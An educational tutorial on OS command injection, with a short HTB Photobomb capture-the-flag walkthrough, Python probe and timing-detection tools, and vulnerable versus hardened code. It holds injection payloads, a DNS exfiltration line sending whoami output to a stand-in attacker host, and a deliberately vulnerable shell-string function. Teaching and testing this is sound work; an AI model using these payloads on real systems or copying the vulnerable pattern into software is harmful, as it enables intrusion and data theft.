What is OS Command Injection?
OS command injection (also called shell injection) lets an attacker execute operating-system commands on the server that runs the vulnerable application, with the privileges of the user the application runs as.
An attacker can often leverage that foothold to compromise other parts of the hosting infrastructure: the adjacent file system, internal services, and other hosts that trust the compromised server.
Injecting OS Commands
Imagine a website that lets you check whether a local retailer has a certain item in stock. It gets this information via a URL like:
https://vulnerable.com/inStock?productId=23&locationId=6
To answer the request, the application queries a few legacy systems by building a shell command from the two parameters:
productstock.pl 23 6
The program prints the stock status of that item at the specified location, and the application returns that output to the user.
This application implements no defenses against OS command injection, so an attacker can change the productId parameter in the URL and thereby change the command that is run. For example, if we inject:
& echo hackertest &
as the productId value, it has to be URL-encoded (& is the query-string separator, so it becomes %26, and spaces become +):
https://vulnerable.com/inStock?productId=%26+echo+hackertest+%26&locationId=6
The application now runs the string productstock.pl & echo hackertest & 6, which the shell parses as three separate commands: productstock.pl with no arguments, echo hackertest, and 6. Because & runs the preceding command in the background and carries on regardless of its exit status, all three execute. The productstock.pl program from earlier therefore returns an error, followed by our output and the shell's complaint about the leftover argument:
Error - productID was not provided
hackertest
6: command not found
Useful Commands
After you identify an OS command injection vulnerability, run a few commands that tell you about the underlying system: which user you are, what OS it is, where it sits on the network, and what else is running on it:
Purpose | Linux | Windows |
---|---|---|
Name of current user | whoami | whoami |
Operating system | uname -a | ver |
Network configuration | ifconfig (or ip addr on hosts without net-tools) | ipconfig /all |
Network connections | netstat -an (or ss -an) | netstat -an |
Running processes | ps -ef | tasklist |
Blind OS Command Injection Vulnerabilities
Most of the time you will not see the raw output of the program you are injecting into: the application runs the command but never includes its output in the HTTP response. These vulnerabilities can still be exploited, but you need to be more observant when looking for them.
Imagine a web application where developers maintain programs and users can leave feedback on them, as long as they provide an email address. The server-side application builds a shell command that emails the feedback to the program's developer, like this:
mail -s "Line 47 is bugged bro." -aFrom:kevin@mail.com developer@mail.com
The mail program produces no output that reaches the response, so injecting echo something as before tells us nothing. We have to infer execution from a side effect instead: a time delay, a file written somewhere we can read, or a network call to a host we control.
Detecting Blind OS Command Injection via Time Delays
If we inject a command that delays the shell, the HTTP response arrives late, and that extra latency tells us the injection worked even though we see no output. For example, inject:
& ping -c 10 127.0.0.1 &
This sends 10 ICMP echo requests to the loopback interface, one per second, so the response takes roughly 10 seconds longer than normal. On Windows the equivalent is ping -n 10 127.0.0.1; on Linux sleep 10 does the same job without generating traffic. Measure a baseline response time first, and confirm with a different delay (5 seconds, then 10) so that ordinary network jitter is not mistaken for a successful injection.
Exploit Blind OS Command Injection by Redirecting Output
If you know, or can guess, a directory under the web root that the application's user can write to, you can redirect the command's output into a file there:
& whoami > /var/www/static/whoami.txt &
This writes the output of whoami into whoami.txt in the static directory, which in this case is served by the site, so we can read it by fetching http://vulnerable.com/whoami.txt (this assumes /var/www/static is the web root). If the file never appears, the directory is probably not writable by the application's user, or is not served at that URL.
Exploit Blind OS Command Injection using Out-Of-Band Techniques
You may be able to inject a command that makes the server call out to a host you monitor, for example:
& nslookup your-attacker-server.com &
This triggers a DNS lookup for your domain, which you can observe in the logs of your authoritative nameserver or in an interaction-logging service such as Burp Collaborator. DNS is a good channel because the query usually leaves the network even when outbound HTTP is blocked. The same channel exfiltrates command output: embed the output in the queried name, as in & nslookup $(whoami).your-attacker-server.com &, and the value arrives at your server as a subdomain label.
OS Command Injection Characters
Everything so far relied on a command separator. We have used & almost exclusively, but there are several others, and they differ by shell and by meaning. &, &&, | and || work in both Unix shells and Windows cmd.exe. The semicolon ;, a newline (0x0a, %0a when URL-encoded) and inline execution with backticks around a command or $(command) are Unix-only; the inline forms are useful when your input lands inside a quoted string or the middle of an argument rather than at the end of the command. Semantics matter when choosing one: && only runs your command if the previous one succeeded, || only if it failed, and | feeds the previous command's output into yours, whereas &, ; and newline run it unconditionally. Remember to URL-encode & (%26) and ; (%3B) in a query string or form body, or the server will treat them as parameter separators and your payload will never reach the shell intact.
Public payload lists on GitHub collect these separators together with their encodings.
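The following is an added example, not code from the page: it turns the separator list above into a set of injection probes for a parameter value, raw and URL-encoded, so the encoding mistake that silently drops & from a query string cannot happen. The probe command and the target labels are assumptions.

```python
"""Generate OS command injection probes for a parameter value.

Added example, not the page's code. Assumptions: 'echo hackertest' is the
probe command and 'linux'/'windows' are the only targets distinguished.
"""
from urllib.parse import quote_plus

# separator, shells it works in, and how the probe attaches to the original value
SEPARATORS = [
    ("&",  ("linux", "windows"), "both_sides"),  # background the previous command, run ours
    ("&&", ("linux", "windows"), "after"),       # ours runs only if the original succeeded
    ("|",  ("linux", "windows"), "after"),       # the original's stdout is piped into ours
    ("||", ("linux", "windows"), "after"),       # ours runs only if the original failed
    (";",  ("linux",),           "both_sides"),  # sequential, unconditional (Unix shells only)
    ("\n", ("linux",),           "both_sides"),  # newline behaves like ';' (Unix shells only)
]
# Inline forms that work even when the input lands inside an argument or quotes (Unix only).
INLINE = ["`{cmd}`", "$({cmd})"]


def build_probes(original: str, cmd: str = "echo hackertest", target: str = "linux") -> list:
    """Return (raw, url_encoded) pairs for every separator valid on `target`.

    'both_sides' puts the separator before and after the probe so that whatever
    the server appends to the command line (the '6' in the page's example)
    becomes a separate command instead of an argument to ours.
    """
    raws = []
    for sep, targets, placement in SEPARATORS:
        if target not in targets:
            continue
        if placement == "both_sides":
            raws.append(f"{original} {sep} {cmd} {sep}")
        else:
            raws.append(f"{original} {sep} {cmd}")
    if target == "linux":
        raws.extend(f"{original} {form.format(cmd=cmd)}" for form in INLINE)
    # quote_plus encodes '&' as %26, ';' as %3B, newline as %0A and space as '+',
    # which is the form a query string or form body needs.
    return [(raw, quote_plus(raw)) for raw in raws]


if __name__ == "__main__":
    for raw, encoded in build_probes("23"):
        print(f"{raw!r:34} -> productId={encoded}")
```

Paste the encoded column straight into the parameter; keep the raw column to read what the shell will actually see.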
Quiz (HTB Photobomb)
This is an easy-difficulty Linux box where OS command injection gives us a reverse shell.
On the site we can reach the /printer endpoint once logged in; inspecting the page source reveals cleartext credentials in one of the referenced JavaScript files.
We can capture a POST request to /printer and it looks something like this when downloading an image:
The web application uses this request data to fetch the picture. We can try to inject commands into each of these parameters, but we are met with 500 - Internal Server Error each time, so there is no visible output to work with and we fall back on a time delay.
If we modify the filetype parameter to jpg;sleep+10 (the + is a URL-encoded space, so the shell sees jpg;sleep 10), the page takes about ten seconds longer to respond, which confirms that the injected command executes.
Replacing sleep 10 with a URL-encoded reverse shell payload pointed at a listener on our machine gives us a shell as the www-data user, from which the rest of the box can be compromised.
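The timing check above, and the ping/sleep detection described in the time-delay section, as an added example that is not part of the original write-up or of Hack The Box: a small detector that times a baseline request, times the same request with a sleep payload in one parameter, and reports whether the difference matches the requested delay. The target URL, headers and form fields are placeholders, and the two simulated endpoints are constructed here so the detector can be exercised offline.

```python
"""Time-based detection of blind OS command injection.

Added example, not the page's code. Assumptions: the real target's URL,
session headers and form fields are supplied by the caller; the simulated
endpoints below stand in for the vulnerable and fixed /printer handlers.
"""
import subprocess
import time
import urllib.error
import urllib.parse
import urllib.request


def build_sleep_payload(base_value: str, delay: int, separator: str = ";") -> str:
    """'jpg' -> 'jpg;sleep 10'. The original value keeps the server's command
    valid, the separator ends it, and sleep stalls the shell for `delay` s.
    urlencode() later turns the space into '+', giving the page's jpg;sleep+10."""
    return f"{base_value}{separator}sleep {delay}"


def _timed(send, params: dict) -> float:
    start = time.monotonic()
    send(params)
    return time.monotonic() - start


def detect_time_based_injection(send, params: dict, target_param: str,
                                delay: int = 10, repeats: int = 2,
                                separator: str = ";") -> dict:
    """Compare the fastest baseline response with the fastest response that
    carries the sleep payload in `target_param`. Taking the minimum over
    `repeats` discards slow outliers caused by jitter, while a genuine sleep
    can never make the injected request faster than `delay` seconds."""
    baseline = min(_timed(send, dict(params)) for _ in range(repeats))
    injected = dict(params)
    injected[target_param] = build_sleep_payload(params[target_param], delay, separator)
    injected_time = min(_timed(send, injected) for _ in range(repeats))
    return {
        "baseline_s": round(baseline, 3),
        "injected_s": round(injected_time, 3),
        "confirmed": injected_time - baseline >= 0.8 * delay,
    }


def http_form_sender(url: str, headers=None):
    """Return a send(params) callable that POSTs a URL-encoded form to `url`.
    A 500 (what /printer answers for malformed parameters) is still a timed
    response, so HTTPError is swallowed rather than treated as a failure."""
    def send(params: dict) -> None:
        body = urllib.parse.urlencode(params).encode()
        request = urllib.request.Request(url, data=body, method="POST",
                                         headers=headers or {})
        try:
            with urllib.request.urlopen(request, timeout=120) as response:
                response.read()
        except urllib.error.HTTPError:
            pass
    return send


def simulated_vulnerable_send(params: dict) -> None:
    """Constructed stand-in for the vulnerable handler: the filetype value is
    spliced into a shell string, exactly the pattern the page describes.
    ls is used in place of the real image tool so this runs anywhere."""
    subprocess.run(f"ls photo.{params['filetype']}", shell=True, capture_output=True)


def simulated_safe_send(params: dict) -> None:
    """Stand-in for a fixed handler: the value is one argv element, never
    re-parsed by a shell, so the sleep payload is just an odd filename."""
    subprocess.run(["ls", f"photo.{params['filetype']}"], capture_output=True)


if __name__ == "__main__":
    fields = {"filetype": "jpg"}  # add the other captured form fields here
    print("vulnerable:", detect_time_based_injection(simulated_vulnerable_send, fields, "filetype", delay=2))
    print("safe:      ", detect_time_based_injection(simulated_safe_send, fields, "filetype", delay=2))
    # Against the real box (assumed URL and headers):
    # send = http_form_sender("http://<target>/printer", headers={"Cookie": "<session>"})
    # print(detect_time_based_injection(send, fields, "filetype", delay=10))
```

Run it once with delay=5 and once with delay=10 against a live target; two confirmations whose measured delays scale with the requested value are much harder to explain away as network noise than a single slow response.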
Preventing OS Command Injection
Ideally, avoid calling OS commands from application code at all: use the language's own library or API for the task (sending mail, converting an image, querying stock) instead of shelling out with user-supplied input.
If you must invoke an external program, never build a single shell command string from user input. Pass the program and its arguments as a list through an API that does not go through a shell, so that user data can only ever be an argument and never a command, and combine this with strong, robust input validation:
- Validate user input against a whitelist of permitted values
- Validate that the input is the expected data type (for example, a numeric ID)
- Validate the set of characters allowed, and reject anything else rather than trying to strip or escape shell metacharacters, since escaping is easy to get wrong
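To make the difference concrete, here is an added example (not the page's code) of the stock-lookup endpoint from the "Injecting OS Commands" section written three ways: as the vulnerable shell string, with argument separation only, and with argument separation plus the allow-list validation recommended above. It assumes a small shell function standing in for productstock.pl so that it runs offline; in real code the hardened call would be subprocess.run(["productstock.pl", product_id, location_id], ...).

```python
"""Vulnerable, argv-only and hardened versions of the stock lookup.

Added example, not the page's code. Assumption: productstock.pl is replaced
by a shell function (STOCK_PROGRAM) so the example runs without the legacy
system.
"""
import re
import subprocess

# Stand-in for the legacy productstock.pl program (constructed for this example).
# It expects exactly two arguments: <productId> <locationId>.
STOCK_PROGRAM = (
    'productstock() { '
    '[ "$#" -eq 2 ] || { echo "Error - productID was not provided" >&2; return 1; }; '
    'echo "product $1 at location $2: 5 in stock"; }'
)

# Allow-list: both parameters must be short, all-digit IDs.
ID_PATTERN = re.compile(r"[0-9]{1,8}")


def lookup_vulnerable(product_id: str, location_id: str) -> str:
    """The page's pattern: user input concatenated into one shell string.
    product_id = '& echo hackertest &' makes the shell run three commands."""
    command = f"{STOCK_PROGRAM}; productstock {product_id} {location_id}"
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


def lookup_argv_only(product_id: str, location_id: str) -> str:
    """Argument separation only: the values reach the program as $1 and $2
    and are never re-parsed by a shell, so metacharacters are inert data."""
    script = f'{STOCK_PROGRAM}; productstock "$1" "$2"'
    result = subprocess.run(
        ["sh", "-c", script, "productstock", product_id, location_id],
        capture_output=True, text=True,
    )
    return result.stdout


def lookup_hardened(product_id: str, location_id: str) -> str:
    """Argument separation plus allow-list validation: anything that is not a
    numeric ID is rejected before it gets anywhere near a process."""
    for name, value in (("productId", product_id), ("locationId", location_id)):
        if not ID_PATTERN.fullmatch(value):
            raise ValueError(f"{name} must be a numeric ID, got {value!r}")
    return lookup_argv_only(product_id, location_id)


if __name__ == "__main__":
    payload = "& echo hackertest &"
    print("vulnerable:", repr(lookup_vulnerable(payload, "6")))   # 'hackertest\n'
    print("argv only: ", repr(lookup_argv_only(payload, "6")))    # payload printed as data
    try:
        lookup_hardened(payload, "6")
    except ValueError as exc:
        print("hardened:  ", exc)
```

Argument separation alone already stops the command from executing, which is why it is the primary control; the allow-list is the second layer that also keeps the legacy program from ever seeing junk it was not written to handle.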